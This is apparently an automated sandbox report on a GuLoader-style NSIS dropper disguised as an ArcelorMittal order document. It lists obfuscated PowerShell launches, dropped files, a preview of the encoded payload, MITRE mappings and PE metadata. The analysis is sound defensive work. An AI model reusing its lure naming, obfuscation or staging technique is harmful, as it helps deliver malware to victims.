    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_007E1112 wsprintfA,GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,CharUpperBuffW,GlobalReAlloc,GlobalLock,lstrcatW,EnumDisplaySettingsA,GlobalSize,EnumDisplaySettingsA,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_007E1112
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00406054 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406054

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API    		Path Interception1
    Access Token Manipulation    		1
    Virtualization/Sandbox Evasion    		OS Credential Dumping1
    Virtualization/Sandbox Evasion    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
    Process Injection    		1
    Access Token Manipulation    		LSASS Memory1
    Application Window Discovery    		Remote Desktop Protocol1
    Clipboard Data    		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Time Based Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Time Based Evasion    		NTDS2
    File and Directory Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets3
    System Information Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 716470 Sample: Order_request_0003352030_Ar... Startdate: 05/10/2022 Architecture: WINDOWS Score: 68 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected GuLoader 2->39 41 Executable has a suspicious name (potential lure to open the executable) 2->41 43 Initial sample is a PE file and has a suspicious name 2->43 7 Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe 1 33 2->7         started        process3 file4 33 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->33 dropped 35 C:\Users\user\AppData\Local\...\System.dll, PE32 7->35 dropped 45 Mass process execution to delay analysis 7->45 11 powershell.exe 7->11         started        13 powershell.exe 7->13         started        15 powershell.exe 7->15         started        17 55 other processes 7->17 signatures5 process6 process7 19 conhost.exe 11->19         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        27 conhost.exe 17->27         started        29 conhost.exe 17->29         started        31 51 other processes 17->31

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe73%ReversingLabsWin32.Trojan.Leonem
    Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe33%MetadefenderBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll8%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll0%MetadefenderBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorOrder_request_0003352030_Arcelormittal_837478220293874639220654_documents.exefalse
      		high

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:716470
      Start date and time:2022-10-05 09:25:24 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 35s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:127
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal68.troj.evad.winEXE@166/5@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 45.4% (good quality ratio 44.5%)
      • Quality average: 88.8%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 52
      • Number of non-executed functions: 32
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dllnew order.xlsxGet hashmaliciousBrowse
        PI_372572000079567W.exeGet hashmaliciousBrowse
          PI_372572000079567W.exeGet hashmaliciousBrowse
            RFQ73645937392344.exeGet hashmaliciousBrowse
              RFQ73645937392344.exeGet hashmaliciousBrowse
                OmslagstegningGermany.exeGet hashmaliciousBrowse
                  OmslagstegningGermany.exeGet hashmaliciousBrowse
                    SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exeGet hashmaliciousBrowse
                      SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exeGet hashmaliciousBrowse
                        SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exeGet hashmaliciousBrowse
                            SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                              SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                                        INVO-0987654345678.exeGet hashmaliciousBrowse
                                          INVO-0987654345678.exeGet hashmaliciousBrowse
                                            v22-003920.exeGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\System.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):11776
                                              Entropy (8bit):5.655335921632966
                                              Encrypted:false
                                              SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                              MD5:EE260C45E97B62A5E42F17460D406068
                                              SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                              SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                              SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Metadefender, Detection: 8%, Browse
                                              Joe Sandbox View:
                                              • Filename: new order.xlsx, Detection: malicious, Browse
                                              • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                              • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                              • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                              • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                              • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                              • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                              • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                              • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                              • Filename: v22-003920.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):6656
                                              Entropy (8bit):5.139253382998066
                                              Encrypted:false
                                              SSDEEP:96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
                                              MD5:1B0E41F60564CCCCCD71347D01A7C397
                                              SHA1:B1BDDD97765E9C249BA239E9C95AB32368098E02
                                              SHA-256:13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
                                              SHA-512:B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Dybdemaaler100\Reservationsseddelen\Sandwichmnd\network-workgroup-symbolic.svg

                                              Download File
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):824
                                              Entropy (8bit):5.20249576082362
                                              Encrypted:false
                                              SSDEEP:24:t4CBGDT/MA6x+mXkvG3ll4AeW0WNDNHkdMRAeW0fcj:gDT/owRvGn4AewpOiAe5cj
                                              MD5:4F05487595F8C324710ACC9E0359A72F
                                              SHA1:20FFAD557E25CA662F3EF4FCC0A0479F483B209E
                                              SHA-256:9BFFBE1954818E8A73B0A11734BC1D684118DF513766EDDD5C424E8FEBE74FAA
                                              SHA-512:128526C5A71F1E885E4F18157AEE73F7EEE98FBA15C32A28F42D9FCFAD953972409264F82F6A3A14A1AA1FAC829F39DB9CEAD2FEE06C0258F26DCBE2142BC751
                                              Malicious:false
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" font-weight="400" fill="#474747"><path d="M1.75 4C.798 4 0 4.798 0 5.75v4.5C0 11.202.798 12 1.75 12h.125l-.781 1.563L.375 15h9.25l-.719-1.437L8.125 12h.125c.952 0 1.75-.798 1.75-1.75v-4.5C10 4.798 9.202 4 8.25 4zM2 6h6v4H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Sans" overflow="visible"/><path d="M7.75 1C6.798 1 6 1.798 6 2.75V3h8v4h-3v3.25c0 .66-.252 1.27-.656 1.75h5.28l-1.5-3h.126C15.202 9 16 8.202 16 7.25v-4.5C16 1.798 15.202 1 14.25 1z" style="line-height:normal;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Andale Mono" overflow="visible"/></g></svg>

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate\Teknologiarbejderne5.Int

                                              Download File
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:ASCII text, with very long lines (33026), with no line terminators
                                              Category:dropped
                                              Size (bytes):33026
                                              Entropy (8bit):3.9996757943834025
                                              Encrypted:false
                                              SSDEEP:768:lHKaguobUqQBVK2YBYLZm+sMFIUfK1WvJvsefrM9QVUDQqIPbyq:lqag9bBOWYL0+sMdfCwJRQ99QqIP+q
                                              MD5:623EFE7EB234A081485070FFFAA64F7B
                                              SHA1:FED843582333608F0638AA899FCF160AE4539EA9
                                              SHA-256:B838758AF694DBEF9C8F5B57EEC38F0C66A35CF27F4FEA9A3A5230A586B0D9BB
                                              SHA-512:27E1306E111F0DFF7E4976D3AAB4C1208A57EE99B8E8570564DDAFBF52F881F2AB8290DC66F7850C3B07BE4B33BA12D6EB383744CA8BD5948ED7580B86C90265
                                              Malicious:false
                                              Preview:E2DA6B6570CB656C31973A3A41D7656176C046696EC041286F8572342289206922957838329530303295302C22CC20302E8570203289206922912C206B8530783A952C206B8530296B8B723322FC6B6570CB656C31973A3A54CC727477C46C416EC96F632ACC302C6B8530783395303032952C206B853078319530302E85692032DD34302BD52E7233FC6B6570CB656C31973A3A51C074466BC965506DCC6E7467D7286970962C206B8531343091202C22CC20302ECC20302BCC2E7230FC6B6570CB656C31973A3A50C0616444CC6C652ACC72332E85692070942C206B8530783395303032952C2A6B85302C22CC20302BCC2E7230FC757367D73332389F43616EC957696CC16F7752D76F63438D697233852C6922952C6922952C206B85302C22CC20302BFC9B715026376949DB424CE98BCF54DA6B283889D10B3E26CAA11F430BC4FF7FE2BF2B90EDA47C6F063B029564ABE5FF46ECD9056FDB8B32097C888F28EFFFFE3A7739E9F7922BEF389C58742607ACEB6DCF0FB692B411A0D5A064627072128CBAE404432BAE4F9BEA51626F30190638478411157EB2ACF6750867A41D8903CC2EABE857CBF331E4301C1C3700F32339BF5FF03DF9EE36352CD6C05988D9F2D0E366E73F114377C7A94C1810BAB28EC619C4FF40FB3F0DDA314197CBB51F09A6EB5C0B497B978A9D9394795441B741

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\undertaking.Emp

                                              Download File
                                              Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):75601
                                              Entropy (8bit):7.596335529805053
                                              Encrypted:false
                                              SSDEEP:1536:KlWX5dQqTczvX6odPXtl4AqykbknyUiCH/ZC4qyIfP1BMj/uvDtL:KGd/Qj6QXtl4AxEkyUiy/ZC4qvP1B4ut
                                              MD5:0A2A7A577FFC1CBD0CD4980A1FA68B31
                                              SHA1:02674F0BEF0FC4474605CB1027B89EC37A550534
                                              SHA-256:9927E32AB7E685B6B8F3BC0AE87B35AEE629E95AE3A7E5FB492B65A808019B3D
                                              SHA-512:E6FFE90D38A80FABA241B87CD975FAB1B2C4D9A2408926AF2E4D2B141FA1556CD2245814F705C30A268401B6D4612B5D728639956B18E670899AF480B9783CAD
                                              Malicious:false
                                              Preview:....Chaa..h....Z2..Ql.{.!}.......:...r`A...A.....#.+u)z.. 0..s...+$.(R._......Z.fO.......t.zh.*...._......p[........8..>...y...v*h>c.B.4.......b..n&...........s)T|..Ir...WB....D.c....._..f.g..:.....a.U.G6..{.....0.......O.M.>.4X..h0.......j<.5...?...D.K.DT...g.6p..4...OQ.`......,[.(#.cs6B......eV.z...b.M.4.Z.rR...^(....LNX-..4.... .+...gI.Dyq.6..S......=.....+z...4.F.9.Ci..j*5.W.m./...........eU3......t.f:."(.x'.c.........DcOB..@.p..~...er.........k.r.<<...ig..[*..0.......e.........5....]t!.0PE.9.........|:..&.j8..6...'..X....Lq.k.....[......`...b"i..+.......l..;.v..tq............8...aXa..U.c.k.z.C9C.L...P.[..ld..p.B.g..`..g=...#..N...K.M...;.f..Nh7+..sR......g.|oG*(.....Z<.-#>...Ub...F.@s5./..?E3.O....$o.7...0..[.........1.J..C..."c"n....<.g.Vq.".D.?.Y....#...V..Q#.Udl?e...&Q....6.........eA..6.6A......_G{...{..2..>....!....HW.{..E=...u.c...U.t.........._).:.......9..R..?.(.1T.%.T......;.Mz.f. .x..Z.cO.../!....x..R.J.....3Kx.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.446552283541879
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                              File size:152504
                                              MD5:297cee2e9339ab19cb96a073ca8ba85f
                                              SHA1:b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
                                              SHA256:9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
                                              SHA512:70852b7fb93198aaacfb124d17b4995c1f502ddf9df138ced15db4909e85287052a531c780c27dac54be66af4d2bff0c601f6a074cb4428f374b0f9ce85ebfd7
                                              SSDEEP:3072:a1T//IHWyWJADJuH1btqoqXpEszuTYT3Nf5hqDNPOTjEFMdj3r:M//I2y3A5tqPXp7qE9qpPOT8Mdv
                                              TLSH:D2E3E19177A0F123C8E24F3119AB9B6B9F7F9A1018501643C328AB8B7D31786FC1F656
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.G.@n..@n..@n./O1..@n..@o.K@n./O3..@n..c^..@n.+Fh..@n.Rich.@n.........................PE..L...e..V.................b....:....

                                              File Icon

                                              Icon Hash:f8ce9fb3a386ecf0

                                              Static PE Info

                                              General

                                              Entrypoint:0x40327d
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x567F8465 [Sun Dec 27 06:25:41 2015 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:d4b94e8ee3f620a89d114b9da4b31873

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 10/14/2021 10:21:36 AM 10/13/2024 10:21:36 AM
                                              Subject Chain
                                              • OU="Udmundingens Administrator Jernvrk ", E=Leksikalisere@Millihg15.Hjl, O=Klasseundervisningerne, L=Rudhall, S=England, C=GB
                                              Version:3
                                              Thumbprint MD5:989D958BBA75F9ED140C17FF87CE9B78
                                              Thumbprint SHA-1:9D1DFBA4F47ACE4298D7058D82020DFC8C5FCFD6
                                              Thumbprint SHA-256:7E2D22EF8F2D6E9356AA4CF38ACDCF3258CB3350B3554253D08F5DE9C8AA78D3
                                              Serial:A5FAA65B4F605A1F

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000002D4h
                                              push ebp
                                              push esi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+0Ch], ebp
                                              push 00008001h
                                              mov dword ptr [esp+0Ch], 0040A300h
                                              mov dword ptr [esp+18h], ebp
                                              call dword ptr [004080B0h]
                                              call dword ptr [004080ACh]
                                              cmp ax, 00000006h
                                              je 00007FC2F8F5B183h
                                              push ebp
                                              call 00007FC2F8F5E2C6h
                                              cmp eax, ebp
                                              je 00007FC2F8F5B179h
                                              push 00000C00h
                                              call eax
                                              push ebx
                                              push edi
                                              push 0040A2F4h
                                              call 00007FC2F8F5E243h
                                              push 0040A2ECh
                                              call 00007FC2F8F5E239h
                                              push 0040A2E0h
                                              call 00007FC2F8F5E22Fh
                                              push 00000009h
                                              call 00007FC2F8F5E294h
                                              push 00000007h
                                              call 00007FC2F8F5E28Dh
                                              mov dword ptr [007A8A44h], eax
                                              call dword ptr [00408044h]
                                              push ebp
                                              call dword ptr [004082A8h]
                                              mov dword ptr [007A8AF8h], eax
                                              push ebp
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebp
                                              push 0079FF00h
                                              call dword ptr [0040818Ch]
                                              push 0040A2C8h
                                              push 007A7A40h
                                              call 00007FC2F8F5DE7Ah
                                              call dword ptr [004080A8h]
                                              mov ebx, 007B3000h
                                              push eax
                                              push ebx
                                              call 00007FC2F8F5DE68h
                                              push ebp
                                              call dword ptr [00408178h]

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84bc0xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d80000x6ea8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x24cc80x6f0.data
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x61550x6200False0.6741470025510204data6.472221311938333IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x13700x1400False0.441015625data5.105712848520416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x39eb380x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x3a90000x2f0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x3d80000x6ea80x7000False0.545166015625data5.216552612077974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x3d83880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
